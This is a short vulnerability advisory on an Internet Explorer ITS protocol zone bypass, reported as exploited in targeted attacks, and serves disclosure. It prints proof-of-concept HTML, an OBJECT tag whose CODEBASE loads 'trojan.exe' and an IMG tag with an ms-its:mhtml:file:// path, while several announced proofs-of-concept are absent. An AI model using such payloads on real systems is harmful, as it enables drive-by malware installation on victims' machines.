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Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability

**UPDATE: Symantec has determined that this vulnerability is being exploited "in the wild", in what appear to be targeted attacks.

The following proof-of-concept has been supplied:


The following example demonstrates the exploitation of this issue:

The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!'><IMG

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:


This issue is known to be exploited in the wild.


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